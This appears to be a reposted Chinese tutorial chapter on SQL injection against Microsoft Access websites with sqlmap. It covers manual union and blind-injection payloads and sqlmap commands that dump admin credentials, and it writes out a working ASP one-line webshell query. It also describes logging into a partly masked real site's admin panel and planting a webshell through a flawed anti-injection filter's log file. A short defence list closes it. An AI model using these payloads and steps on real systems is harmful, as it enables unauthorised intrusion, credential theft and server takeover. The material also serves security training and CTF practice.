sqlmap从入门到精通-第五章-5-1 使用sqlmap进行Access注入及防御

标签：表名   request   完整   web   ctf   管理系统   form   程序   next   

5.1 使用sqlmap进行Access注入及防御

对于存在Access注入的站点，可以通过手工注入或者工具注入来获取Access数据库中的表内容，特别是获取网站后台管理表中的用用户名和密码

5.1.1 Access数据库简介

Microsoft Office Access是由微软发布的关系数据库管理系统。它结合了 Microsoft Jet Database Engine和图形用户界面两项特点,是 Microsoft Office的系统程序之一。

1. Access数据库结构

Access数据库此阿勇表名-列名-内容数据，她跟其他数据库不一样，例如：MySQL，MSSQL，像这类数据库需要先创建数据库名，而Access数据库则不需要创建，因为她是个mdb格式的文件，一个库可以包含多个表

2. 操作Access数据库

默认情况下Office会安装Access组件来创建数据库，对数据库中的表实施管理操作，可以通过Access数据库访问工具进行操作

5.1.2 Access注入基础

1. Access注入基本流程

(1) 判断有无注入

(2) 猜解表名

(3) 猜解字段

(4) 猜解管理员字段值

(5) 猜解用户名和密码长度

(6) 猜解用户名和密码

(7) 破解加密密码

(8) 寻找并登录后台

2. 常见的注入工具

常见的SQL注入工具有“HDSI 3.0 Goldsun干净拓宽版”、“Domain”、“Safe3”、“啊D工具”、“管中窥豹”、Havij、pangolin、WebCruiser和SQLmap等。目前仅仅SQLmap是开源，出于安全考虑，建议用sqlmap工具进行access注入。

3. 常见的查询方式

(1) 联合查询法（速度快，兼容性不好）

* and 1=1 and 1=2 ——判断注入

* order by 22  ——猜有多少列（12正确，13错误，则为12个）

* union select 1,2,3,4,5,6,7,8,9,10,11,12from admin 猜表名（报错说明表名不存在，将admin表换成别的继续猜测）

union select 1,2,username,4,5,6,7,8,9,10,11,12 from admin 猜列名（列名位置放置页面上显示的数字位置上，报错说明列名不存在，换列明继续猜，列名猜对后及出账号密码）

(2) 逐字猜解法（速度慢，兼容性好）

* and 1=1 and 1=2 ——判断注入

* and exists (select * from admin) 猜表名

* and exists (select user_name from admin) 猜列名 查数据：1.确定长度 2.确定asc数据(asc编码)

* and (select top 1 len(user_name ) fromadmin)=5(user_name 的长度=5，正常则=5，也可以用>,<号去判断）

* and (select top 1 asc(mid(user_name ,1,1))from admin)=97 判断第一位 (97代表‘a’的ascll值)

* and (select top 1 asc(mid(user_name ,2,1))from admin)=97 判断第二位

(user_name =admin 第一位a 第二位d 第三位m 第四位i 第五位npass_word=a48e190fafc257d3)

4. 判断有无注入

(1) 粗略型：提交单引号’，id值-1、id值+1，判断页面显示信息不同或者出错信息。

(2) 逻辑型（数字型注入）：and 1=1 , and 1=2；正常显示，内容与正常页面显示的结果基本相同；提示BOF或EOF（程序没做任何判断时），或提示找不到记录，或显示内容为空（程序加了on error resume next）；在数据库中是否执行，and 1=1 永远为真所以页面返回正常，and 1=2永远为假所以返回的结果会出错，根据其结果来判断是否存在sql注入。

(3) 逻辑型（字符型注入）：’and ’1′=’1/’ 、and ’1′=’2

(4) 逻辑型（搜索型注入）：%’and 1=1 , and ‘%’=‘%/%’ , and 1=2 and ‘%’=‘%

5.1.3 sqlmap思路及命令

1. sqlmap Access注入操作指南

(1) 手工判断url是否存在SQL注入。通过在url传入参数处加入“’”、and 1=1、and 1=2等，查看页面是否出错，如果存在页面不一样或者有出错信息，则表明网站url存在sql注入。常见的错误信息如下：

Microsoft JET Database Engine 错误 ’80040e14′

在联合查询中所选定的两个数据表或查询中的列数不匹配。

/view.asp，行 26

以上信息表明数据库采用Access数据库。

(2) 使用sqlmap进行检测注入点是否可用

Sqlmap命令：sqlmap.py –u url 

如果存在，则会提示进行相应操作，例如判断数据库中的表，如果不存在则无法继续。

(3) 检测表，执行“sqlmap.py –u url -- tables”命令来获取access数据库表，需要选择线程数，建议选择1-20之间，这个数过大，会导致网站无法打开。

(4) 获取数据库表内容

sqlmap.py –u url --tables --columns -T admin

如果存在管理员表admin，则可以通过以上命令来获取admin表中的列。

(5) 获取管理员admin表中的数据内容

sqlmap.py –u url --dump -T admin -C "username,password" 

通过（4）获取admin表中存在username和password列，通过dump参数来获取该表中的所有数据。也可以通过sqlmap.py –u url –sql-query=”select username,password from admin”来获取admin表中的内容，还可以通过sqlmap.py –u url –sql-shell来进行sql查询交互使用。

2. 一个完整的access注入过程命令

(1) 注入点判断：sqlmap.py-u http://www.xxx.com/index.asp?id=1

(2) 猜数据库表:sqlmap.py -u http://www.xxx.com/index.asp?id=1 –tables

输入线程：10，回车后开始跑表，找到合适的表后，按下ctrl+c终止跑表。

(3) 对某个表进行字段猜解

sqlmap.py-u ” http://www.xxx.com/index.asp?id=1” –tables –columns -Tadmin

例如获取admin表的字段如下： id,username,password

(4) 对admin表字段内容进行猜解

sqlmap.py -u " http://www.xxx.com/index.asp?id=1"--dump -T admin -C "username,password" 

(5) 获取明文密码或者加密密码。通过cmd5.com等在线网站进行明文密码破解。

(6) 寻找后台地址，并登录后台

(7) 通过后台管理寻求可以获取webshell的功能模块，尝试获取webshell。

知道web真实路径，且可以通过脚本执行查询，则可以通过查询来获取webshell，例如网站真实路径：d:\freehost\fred200903\web\，则查询语句为：

SELECT ‘<%execute request("a")%>‘ into [a] in ‘ D:\freehost\fred200903\web\x.asp;a.xls‘ ‘excel 8.0;‘ from a Shell地址：http://www.somesite.com/x.asp;a.xls，一句话后门密码a，该shell对存在IIS解析漏洞的Windows服务器平台有效

5.1.4 Access 其他注入

1. Access POST登陆框注入

注入点：http://xxx.xxx.com/Login.asp

(1) 通过burpsurte抓包保存为txt文件，使用sqlmap进行自动注入例如对着注入点使用burp抓包，保存bmfx.txt文件，使用命令：

sqlmap.py -r bmfx.txt -p tfpasswd

(2) 自动搜索表单的方式 

sqlmap-u http://xxx.xxx.com/Login.asp --forms

(3) 指定一个参数的方法

sqlmap -u http://xxx.xxx.com/Login.asp --data "tfUName=1&tfUPass=1"

2.Cookie注入

命令如下：

sqlmap -u "http://www.xxx.com/news.asp" --cookie "id=1" --table --level 2

5.1.5 Access SQL注入实战案例

此处实战可以直接使用墨者的靶机地址如下：

基础实战

SQL手工注入漏洞测试(Access数据库)

https://www.mozhe.cn/bug/detail/VExmTm05OHhVM1dBeGdYdmhtbng5UT09bW96aGUmozhe

高级一点的实战

SQL注入实战(防注入)-Access

https://www.mozhe.cn/bug/detail/VjFKQktvazRNcTdOYkg2cElONVppUT09bW96aGUmozhe

1. 使用AWVS扫描站点

打开AWVS，新建扫描目标，如图1所示，执行WebScanner，扫描结束后可以看到其高危提示显示存在多个SQL盲注。依次展开，获取其详细url地址。在该结果中还可以看到28web目录，该目录后后台地址

2. 手工测试注入点

在url地址地址后加入一个单引号，其url经过编码后显示为%27也即在浏览器中直接访问：http://www.b********n.com/company.asp?id=9&cid=4%27，提示存在类型不匹配，说明可能存在SQL注入。

3. 使用sqlmap检测注入点

使用sqlmap.py –u http://www.xxx.com/company.asp?id=9&cid=4进行注入点检测， SQLMAP已经检测出该url存在SQL注入地址，获取操作系统版本可能是Windows 10或者Windows 2016，数据库为Access。获取Access数据库中表的命令：sqlmap.py –u http://www.b********n.com/company.asp?id=9 --table

4.获取admin表内容

(1) 获取数据库表admin的列名及其导出表内容

依次使用下面的命令来获取数据库表admin的列名及其导出其表内容：

sqlmap.py –u http://www.xxx.com/company.asp?id=9 --tables --columns -T admin

sqlmap.py –u http://www.xxx.com/company.asp?id=9 --dump -T admin –C

(2) 可以通过sql-shell参数来交互查询获取数据

sqlmap.py –u http://www.xxx.com/company.asp?id=9 --sql-shell

执行上面命令后，执行selectusername,password from admin查询来获取当前的所有用户及密码。

5. 登录后台地址

使用地址http://www.xxx.com/28web进行登录，如图6所示成功登录后台。在wvs扫描结果中可以看到有admin_chklogin.asp，所以28web为后台登陆地址。

6. sqlmap查询结果

sqlmap的日志文件以及数据库dump文件均在C:\Users\Administrator\.sqlmap\output\targnet.com目录下。targnet.com为执行注入测试的名称。不同的用户需要修改Administrator为对应的用户名称

7. 技巧

可以使用sqlmap.py –u http://www.xxx.com/company.asp?id=9 –a --batch --smart自动获取所有信息。

5.1.6 SQL通用防注入系统ASP版获取webshell

在Access+ASP架构中，很多网站采用通用防注入系统来防范SQL注入攻击，该系统确实在一定程度上可以防范SQL注入，但是其设计存在一个重大的缺陷，将注入操作的URL数据写入ASP文件中，如果在内容中插入ASP一句话加密木马内容，就可以获取webshell

1. 来自CTF通过的提示

2. 测试语句

1 and 1=1 提示非法操作，同时记录了程序的操作IP，操作时间，操作页面，提交方式，提交参数，提示攻击者网站是有安全防护

3. 使用sqlmap绕过防火墙进行注入测试

经过测试通过使用sqlmap对URL地址进行绕过测试，并未成功

4. 使用加密的ASP一句话木马

此处作者使用的是加密的乱码一句话

5. 访问sqlin.asp

http://www.xxx.com/sqlin.asp

6. 获取webshell

使用菜刀连接 http://www.xxx.com/sqlin.asp

7. 获取key值

8. 漏洞分析

(1) news.asp文件

(2) SQL注入防范程序分析

(3) 安全建议

存在参数传入的地方一定要进行过滤，同时进行类型的严格检查和限定，在本例中使用SQL防范程序可以解决SQL注入，但是如果SQL防范程序存在缺陷的情况，将导致网站存在安全风险，本例可以将sqlin.asp修改为mdb文件也是可以避免

5.1.7 安全防御

(1) 对所有涉及传入参数进行过滤

(2) 使用SQL防注入代码

在连接数据库的下方加入SQL注入防范代码

(3) 使用WAF等防护软件

(4) 数据库登陆账户权限分开，采用最低授权原则

(5) 数据库连接账号要设置强健的密码

(6) 对网站进行安全检查及扫描，即使修复存在的漏洞，特别是禁止在网站根目录打包源代码，防止数据库等配置文件泄露

(7) 禁止在网站目录进行数据库备份

发现作者也把这篇文章发到互联网上去了，具体如下：

https://4hou.win/wordpress/?p=17495

 

sqlmap从入门到精通-第五章-5-1 使用sqlmap进行Access注入及防御

标签：表名   request   完整   web   ctf   管理系统   form   程序   next   

原文地址：https://www.cnblogs.com/autopwn/p/13237266.html